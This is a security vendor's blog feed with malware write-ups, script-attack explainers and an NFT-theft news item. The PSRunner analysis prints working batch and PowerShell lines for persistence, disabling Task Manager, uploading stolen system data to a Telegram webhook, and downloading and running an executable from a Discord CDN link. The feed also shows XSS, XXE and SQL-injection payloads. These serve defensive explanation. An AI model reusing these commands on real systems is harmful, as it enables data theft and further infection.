Script-based Archives – Gridinsoft Blog. Posts about security solutions to keep you, your family and business safe. Feed last updated Thu, 29 Aug 2024 20:14:55 +0000.

Trojan:BAT/PSRunner.VS!MSR
https://gridinsoft.com/blogs/trojan-bat-psrunner-vs-msr/ (published Tue, 23 Jul 2024 18:12:28 +0000)

Trojan:BAT/PSRunner.VS!MSR is a detection name for a malicious batch script that executes commands on a compromised system. It does little harm by itself and mainly serves to deliver and run further payloads. Along the way it performs basic system reconnaissance and sets up persistence for those payloads.

Trojan:BAT/PSRunner.VS!MSR Overview

Trojan:BAT/PSRunner.VS!MSR is a detection identifier used by Microsoft Defender antivirus. This heuristic detection applies to batch files (.bat), scripts interpreted by the Windows command processor (cmd.exe); the sample described here additionally invokes PowerShell for the steps that need it. Typically it downloads and executes additional malicious software, which makes it a simplified dropper. Although less flexible than a compiled loader, PSRunner is still capable of making quite a mess in the system.

Trojan:BAT/PSRunner.VS!MSR detection window in Microsoft Defender

Typically, it is spread through email attachments in phishing campaigns: the emails appear to come from legitimate sources and prompt recipients to open the attachment or click a link. The trojan can also be downloaded from pirate or otherwise malicious websites disguised as cheats and mods for games. In that case the disguise is not an attachment but an entire game installer that serves as a wrapper around the malicious script.

Technical Analysis

Let’s look at how Trojan:BAT/PSRunner.VS!MSR behaves once it runs. As a .bat file it lacks advanced features such as sandbox or debugger checks, but it still tries to stay out of the user’s sight. Its first command sets the hidden and system attributes on its own file (%0 expands to the script’s own path), so the script disappears from a default Explorer view:

attrib +h +s %0

Persistence

Next, the malware takes steps to establish persistence in the system. It executes the following commands:

set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul

With these commands the script registers itself in the HKLM and HKCU Run keys so that it starts at every logon, copies itself to the user’s Startup folder as a second launch point, and appends a start line to autoexec.bat in the root of the system drive. The last one is a legacy trick: NT-based Windows does not execute autoexec.bat at boot, so it adds noise rather than persistence. Note the mixed-case variable references (%rEgINf%, %uSERPROFILE%): cmd.exe resolves variable names case-insensitively, so this costs the author nothing but defeats naive case-sensitive string matching. The %a% variable in the last line is not defined in the excerpt shown.

As mentioned, this is a plain script, not a process that can hide itself: the cmd.exe instance running it (and, during the PowerShell stages, powershell.exe) is visible in Task Manager and can simply be ended. The script’s next step is therefore to disable Task Manager through a policy registry value:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Gathering Information

Next, the malware collects various information about the system. This process is often referred to as system fingerprinting. In this case, the fingerprint is quite detailed. The malware executes the following command:

powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%usErPrOfiLE%\apps.txt"
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\apps.txt %WEbHooK%

The PowerShell command writes the list of installed applications (read from the 32-bit Uninstall registry branch) to apps.txt, and curl uploads that file to the address stored in the %WEbHooK% variable. The multipart fields chat_id and document are the parameters of the Telegram Bot API’s sendDocument method, so the webhook is most likely a bot endpoint and the negative chat_id a Telegram group. The script then gathers system information into userdata.txt with the following commands:

echo Username %usERnAME% >> userdata.txt
echo IP %IPV4% >> userdata.txt
echo. >> userdata.txt
ipconfig >> userdata.txt
echo. >> userdata.txt
getmac >> userdata.txt
echo. >> userdata.txt
wmic cpu get caption name, deviceid, numberofcores maxclockspeed, status >> userdata.txt
echo. >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
echo. >> userdata.txt
wmic partition get name,size,type >> userdata.txt
echo. >> userdata.txt
systeminfo >> userdata.txt
echo. >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt

After gathering this information, it sends the file to a remote server with the following command:

curl -v -F "chat_id=-655682538" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
del userdata.txt
del apps.txt

In this way the malware collects and transmits extensive system details: installed applications, network configuration (ipconfig, getmac), hardware specifications via WMI, the full systeminfo output and even the OEM Windows product key stored in firmware (OA3xOriginalProductKey). Finally, it deletes userdata.txt and apps.txt to cover its tracks.

Payload

The final stage of the script’s execution involves running the following command:

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
ping 127.0.0.1 3 > "e.txt"
start GetToken.exe

The script uses PowerShell’s WebClient.DownloadFile to fetch an executable named GetToken.exe from Discord’s attachment CDN, a hosting service whose traffic blends in with ordinary browsing, and then starts it. The ping to 127.0.0.1 between the two start commands is the usual batch-file substitute for a sleep. All file names are chosen to raise the least suspicion.

How To Remove Trojan:BAT/PSRunner.VS!MSR?

To remove Trojan:BAT/PSRunner.VS!MSR, use an anti-malware solution with a heuristic module, and keep real-time protection enabled to prevent reinfection. GridinSoft Anti-Malware is a good choice because, in addition to proactive protection, it has an Internet Security module that blocks potentially unsafe sites and so stops the infection at the earliest stage.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

How can an attacker execute malware through a script?
https://gridinsoft.com/blogs/script-based-malware/ (published Wed, 19 Jun 2024 07:23:27 +0000)

Over the last four years the share of script-based attacks among malware incidents worldwide has grown so much that it alarmed both security specialists and ordinary users. In this post we look at script-based malware, assess its strengths and weaknesses, explain how the attacks happen, and suggest measures to keep your workgroup secure.

What is Script Malicious Code?

To understand how someone can run a script-based attack on a computer, we first need to know what scripts are. They are sets of commands for a system to execute. Users employ them to automate processes they would otherwise perform manually. Programmers and advanced users write scripts in scripting languages, which can be, roughly speaking, general-purpose (JavaScript, Python, PHP), OS-oriented (PowerShell, AppleScript, Windows batch), or specific to a particular application or environment.

PowerShell window: PowerShell is a handy Windows automation tool and a suitable environment for script-based attacks.

A script is not a compiled program: it is interpreted and executed on the fly by a host environment, without prior translation into machine code. For AppleScript that environment is macOS; for cross-platform JavaScript embedded in a web page, any modern browser serves as the interpreter. Scripts are also often an allowed component of a larger document (a PDF form, an Office file with macros, an HTML page), where they are legitimate and, in theory, useful to the user.

The script-based hacker attacks are cyber crimes that use scripts as a primary tool.

Malware Script Examples

Cross-Site Scripting (XSS) Attacks

XSS (Cross-Site Scripting) attacks can result in data theft, session hijacking, and unauthorized access to confidential information. They also jeopardize user trust, damage the reputation of web applications, and may lead to legal repercussions under data privacy regulations like GDPR (General Data Protection Regulation) and CCPA (California Consumer Privacy Act).

<p>User's comment: <script>alert('Malicious Script')</script></p>
<!-- This user input is not properly sanitized -->
<p>User's comment: <?php echo $_GET['comment']; ?></p>

Consider a website that lets users post comments. The first line shows what the server sends back after an attacker posts a comment containing a script tag whose body is alert('Malicious Script'); the PHP line underneath is the template that produced it, echoing the comment parameter without any encoding. Because the comment is stored and displayed without sanitization or output encoding, the script executes in the browser of every user who views it, and each of them sees a pop-up reading Malicious Script. The alert only illustrates the vulnerability: the same injection point could run code that steals session cookies or other data directly from the victim’s browser.

XML External Entity (XXE) Vulnerability

XXE, or XML External Entity attack, exploits vulnerabilities in applications that parse XML files. This issue arises when an application’s XML parser improperly configures security settings, allowing it to dereference external entities within the XML file. During parsing, if the application processes these entities, it could unintentionally leak sensitive data, disrupt services, perform unauthorized actions on the server, or access other parts of the system.

import xml.etree.ElementTree as ET
xml_data = """
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
"""
root = ET.fromstring(xml_data)

This is the canonical XXE payload: the DTD declares an entity named xxe whose value is read from the file /etc/passwd, and the document body references it. Against a parser configured to resolve external entities, the file content is pulled into the parsed document. CPython’s xml.etree.ElementTree does not fetch SYSTEM entities, so this exact script raises ParseError ("undefined entity") instead of reading the file; the vulnerability materialises with parsers that do resolve external entities, or whenever an application accepts DOCTYPE declarations in untrusted input at all.

SQL Injection

SQL injection is a prevalent cybersecurity risk where attackers can alter a web application’s database by inserting harmful SQL code into its input fields. These fields can include any data entry areas on a website, like web forms or URLs. When successful, SQL injection attacks allow attackers to access and manipulate databases, which could lead to the exposure of sensitive information.

import sqlite3
cursor = sqlite3.connect("users.db").cursor()
user_input = input("Enter your username: ")
# Vulnerable on purpose: the input is concatenated straight into the SQL text
sql_query = "SELECT * FROM users WHERE username = '" + user_input + "'"
cursor.execute(sql_query)

Here the user input is concatenated directly into the SQL query string. Entering ' OR '1'='1 turns the WHERE clause into username = '' OR '1'='1', which is true for every row, so an attacker can read or alter data they are not authorised to see. Parameterised queries, where placeholders are bound by the database driver, are the fix.
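To make the three examples above concrete, here is an added Python example, not code from the original post, that runs each payload against a vulnerable stand-in and a hardened one: output encoding for the comment, a parser wrapper that rejects any DOCTYPE before parsing, and a parameterised query against an in-memory SQLite users table. The table contents and the helper names are constructed for the demo.

```python
"""Vulnerable and hardened forms of the three injection examples above.

Added example, not code from the original post. It reuses the page's
payloads against small stand-ins: an HTML comment renderer, an XML
parser wrapper, and an in-memory SQLite users table (constructed data).
"""
import html
import re
import sqlite3
import xml.etree.ElementTree as ET

# Payloads taken from the sections above.
XSS_PAYLOAD = "<script>alert('Malicious Script')</script>"
XXE_PAYLOAD = """<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""
SQLI_PAYLOAD = "' OR '1'='1"


# --- Cross-site scripting -------------------------------------------------

def render_comment_vulnerable(comment: str) -> str:
    # Equivalent of `echo $_GET['comment']`: input reaches the page untouched.
    return f"<p>User's comment: {comment}</p>"


def render_comment_safe(comment: str) -> str:
    # Output encoding for an HTML text context: <, >, &, " and ' become
    # entities, so the browser renders the payload as text, not markup.
    return f"<p>User's comment: {html.escape(comment, quote=True)}</p>"


# --- XML external entities ------------------------------------------------

_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


def parse_xml_safe(xml_text: str) -> ET.Element:
    # Reject any DTD up front; without a DOCTYPE there is nowhere to declare
    # an entity, internal or external, whatever parser is used afterwards.
    if _DOCTYPE_RE.search(xml_text):
        raise ValueError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(xml_text)


def xxe_blocked(xml_text: str) -> bool:
    try:
        parse_xml_safe(xml_text)
    except ValueError:
        return True
    return False


def elementtree_expands_external_entity(xml_text: str) -> bool:
    # CPython's ElementTree does not fetch SYSTEM entities; it raises
    # ParseError ("undefined entity") instead, so this returns False.
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return False
    return bool(root.text)


# --- SQL injection --------------------------------------------------------

def demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def lookup_user_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    # Same concatenation as the page's snippet.
    sql_query = "SELECT username FROM users WHERE username = '" + user_input + "'"
    return [row[0] for row in conn.execute(sql_query)]


def lookup_user_safe(conn: sqlite3.Connection, user_input: str) -> list:
    # Parameterised query: the driver binds the value; it is never parsed as SQL.
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE username = ?", (user_input,))]


def demo() -> dict:
    conn = demo_db()
    return {
        "xss_vulnerable": render_comment_vulnerable(XSS_PAYLOAD),
        "xss_safe": render_comment_safe(XSS_PAYLOAD),
        "xxe_blocked": xxe_blocked(XXE_PAYLOAD),
        "xxe_expanded_by_elementtree": elementtree_expands_external_entity(XXE_PAYLOAD),
        "sqli_vulnerable": lookup_user_vulnerable(conn, SQLI_PAYLOAD),
        "sqli_safe": lookup_user_safe(conn, SQLI_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable lookup returns every user for the ' OR '1'='1 input while the parameterised one returns none, and the DOCTYPE check refuses the XXE document before any parser sees it.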

What is so worrying about script-based attacks?

First of all, a script is plain text rather than a compiled binary, and it is trivial to rewrite: changing variable names, letter case or encoding produces a new file with a new hash, so the hash- and signature-based detection that works well against compiled malware struggles here. Some scripts never touch the disk at all (a PowerShell one-liner launched from a document macro runs straight from memory), which is why this class of threat is often called fileless and why it can slip past antivirus products that only inspect files.

Another important point is that scripts are hard to trace. A fileless script lives in memory and is soon overwritten or erased; unless the attacker carelessly leaves the launcher (the macro, the command line, the scheduled task) behind, the origin of the script is difficult to reconstruct, and criminals have no reason to leave such traces. PowerShell script block logging and process creation auditing exist precisely to capture this evidence before it is gone.

How can an attacker execute malware through a script?

Let’s be clear: we are not talking about malicious scripts on websites (cross-site scripting), which are comparatively well studied and handled by browser and antivirus protections. The newer problem is ordinary files that carry small but dangerous scripts: formats that antivirus software lets through by default because they are not regarded as executable, such as PDF, Word documents, e-books and HTML applications (.hta).

The simple JavaScript that such files can legitimately contain adds practical functions, such as making a PDF signable or adding a fillable form. But the script can serve a malicious purpose as well. In a script-based attack it is most likely a set of commands that downloads other malware, which does the real harm; ransomware, for instance, is the most lucrative option for the attackers. The crooks only need the user to open the file or, in some cases, to enable macros for it.

Disabled macros in Word. RED FLAG: a downloaded document asks you to enable macros in MS Office.

Script-laden files can also arrive as downloads you trust because they claim to update programs you already have: plug-ins, add-ons and so on. The browser, or a UAC prompt if the installer asks for administrator rights, will warn you, but such prompts appear so often that users tend to click through them. If the criminals manage to cheat you, consider that they have cheated your security software too. Untrustworthy PDF readers and their plug-ins are among the most dangerous programs in terms of script-based attacks.

Script-based attacks mostly target Windows, where they abuse the built-in automation tools, Command Prompt and PowerShell, exactly as designed rather than through any vulnerability in them. Android, iOS and Linux are not immune either.

How to protect yourself and your workgroup?

The weakness of script-based malware is that it has to be run by the user. Therefore, the best protection is to be cautious and avoid unknown downloads. Remember that PDF, Word and other data files can contain a malicious script. Such bogus files most often arrive via e-mail or messengers in messages that seem to come from someone you trust, usually a service provider. Be especially wary of notifications from delivery companies like FedEx: an unexpected parcel is believable, so attackers often use this disguise for phishing. Before downloading any attachment from a suspicious sender, triple-check the source and the message itself. If you are attentive enough, you will find a mistake in the address line, your name, or the text itself.

Email with a PDF attachment. Watch out for dubious e-mails with enclosed PDF files, Word documents, HTML applications, etc.

In workgroups it makes sense to separate the computers that need to run scripts from those that can do without them. The former deserve extra vigilance and, ideally, an allow-list (zero-trust) execution policy such as Windows Defender Application Control or Smart App Control in Windows 11. These have their rough edges, but they seriously disrupt the plans of attackers who rely on script-based attacks.

Once inside, script-carrying files can spread through the network using the same Windows features they use to deliver their payload (network shares, remote execution via PowerShell, and so on). General measures such as backups and network segmentation remain a must to limit the damage of any successful attack.

How to detect script-based malware?

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:Script/Phonzy.B!ml
https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/ (published Tue, 27 Feb 2024 08:45:57 +0000)

Trojan:Script/Phonzy.B!ml is a generic detection name used by Microsoft Defender. This type of malware is categorized as a loader as it mainly aims at delivering malicious payloads onto infected systems. Throughout hundreds of infection cases, Phonzy trojan was noticed to often deliver banking trojans.

Trojan:Script/Phonzy.B!ml Overview

Trojan:Script/Phonzy.B!ml is a generic detection name that Windows Defender uses to mark small malware families. Such malicious programs may have similar behavior and code elements but belong to different groups.

Phonzy B!ml detection Defender

Functionally, Phonzy.B!ml is a scripted dropper: its main purpose is to download and launch additional malware without user interaction. Phonzy samples also collect basic information about the system (location, OS version and the like). A typical payload in Phonzy attacks is a banking trojan, a type of stealer aimed specifically at online banking credentials.

Is Phonzy B!ml False Positive?

A closer look at Microsoft’s naming convention shows that the “!ml” suffix stands for machine learning: the file was flagged by the AI detection engine rather than by a signature. ML detection is effective and promising, but a verdict that is not backed by a signature match is considerably more prone to false positives.

Unfortunately, there is no reliable way to tell a real detection from a false one by eye: modern malware does its best to hide among legitimate programs and files, so the file’s location alone is not informative. That is why I recommend scanning your system with GridinSoft Anti-Malware; if you still suspect a false positive, the file can also be submitted to Microsoft for analysis.

Phonzy.B!ml Technical Analysis

Since Phonzy is a generic detection name, it is rather hard to find a well-known sample to analyze. For that reason, I’ve done a comprehensive analysis of several ones – to have a better understanding of what this malware is capable of. In short – a rather simple dropper that can make a huge mess in the system it infects.

Launch & Unpacking

The majority of Phonzy samples that I’ve encountered arrive in a packed form – encrypted and/or archived. This is usually done for 2 reasons – to avoid the static detection and complicate the analysis. In the case of Phonzy, I’m leaning toward the first option.

Unpacking process: the malware being unpacked

For unpacking, Phonzy relies on the script that delivered it. Usually this is a PowerShell script that pulls the dropper from an intermediary server and is also responsible for launching it; part of the script unpacks and starts the sample after the download.

Gathering system information

Once launched, Trojan:Script/Phonzy.B!ml collects basic information about the target system. This may include the operating system version, hardware information, a list of installed programs and devices, and the device’s geolocation. Such information is mostly needed to fingerprint the system, i.e. give it a specific name corresponding to its internals. In addition to system info, some of the Phonzy.B!ml samples were able to take screenshots of the infected device’s screen.

System info log collected by one of the Phonzy samples

Contacting Command & Control Server

The next step in the attack is contacting the command server. Malware sends an HTTP POST request to the C2, to notify about a new infection and send the collected data. Depending on the server response, malware may switch to idle or start downloading other malware. Overall, the C2 communications for Phonzy are simple and insignificant.

Delivering other malware

The key action of Phonzy Trojan is, obviously, deploying other malware samples to the infected system. It receives the instructions from the C2 in a form of IP address it should pull the payload from, and the way this payload should be launched. Usually, the said IP address corresponds to a compromised website that hackers use as an intermediary server.

The ways of running the payload are typical for droppers. All the Phonzy samples I analysed could handle both DLLs and executables: a DLL is loaded through DLL hijacking, i.e. placed where a legitimate process will pick it up in place of a system DLL, while an executable is simply run.

Self-Propagation to USB Drives

Some of the inspected Phonzy.B!ml variants were capable of self-propagating via attached flash drives or other removable media. This is a rather unusual trick for modern malware, since security vendors developed ways to detect virus-like spreading long ago. Nonetheless, it is effective: a single infected USB drive can infect dozens of other systems without the operators lifting a finger.

How To Remove Trojan:Script/Phonzy.B!ml

To remove Phonzy B!ml, I’d recommend using GridinSoft Anti-Malware. The fact that dropper malware can spread a lot of other malware requires using advanced software to remove it all. GridinSoft Anti-Malware will check every little bit of the system and eliminate even the stealthiest malware.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Safety Recommendations

To avoid infection of your system, it is sufficient to follow basic cyber hygiene. The first rule is to avoid pirated software and sites that distribute it. Cracked software is an ideal shell for malware delivery, so it is not just about being careful – it is about staying away.

Having an advanced protection tool, like Gridinsoft Anti-Malware, is another key to make your system secure. Proactive protection coupled with an AI detection engine will weed out all the attempts of malicious software to get in. Also, its Removable Device Protection feature will block the Phonzy trojan attempting to infect the system via an USB drive.

29 Moonbirds Stolen via Link Click from a Proof Collective Member
https://gridinsoft.com/blogs/moonbirds-stolen/ (published Wed, 01 Jun 2022 16:18:05 +0000)

29 Moonbirds, NFTs worth around 750 ETH (approximately $1.5M), were stolen from an unnamed Proof Collective member in a scam, according to a May 25 tweet by @CirrusNFT. The theft happened when the victim followed an unverified link and signed a transaction offered by a scammer posing as a legitimate buyer.

The source of the news: a tweet by @CirrusNFT.

Another Proof Collective member, nicknamed Dollar (@knownasdollar on Twitter,) hinted that the scammer had been identified as @DVincent_ through doxxing via an exchange. According to the tweet, the total value of the items stolen by him (her?) reached around $2M.

Dollar and other Proof Collective members have already filed a report to the FBI; however, in his tweet, Dollar gave the crook a chance to avoid jail by delivering the stolen NFTs back.

The tweet by @knownasdollar exposing the Twitter account of the alleged criminal.

In the replies to Dollar’s message, other users confirmed that the alleged scammer had also tried to lure them into selling NFTs while insisting that the deal be struck on a questionable peer-to-peer exchange.

The Twitter page of @DVincent_ is already inaccessible. Well, of course!

Proof Collective is a private club of non-fungible token collectors founded by Kevin Rose. To become a member, one must own a Proof Collective NFT. The membership fee is high enough to scare off random passers-by: 88 ETH, which was more than $200,000 in May 2022. Proof Collective is best known for Moonbirds, a heavily hyped NFT campaign (10,000 owl avatars sold at 2.5 ETH each) launched on April 16, 2022.
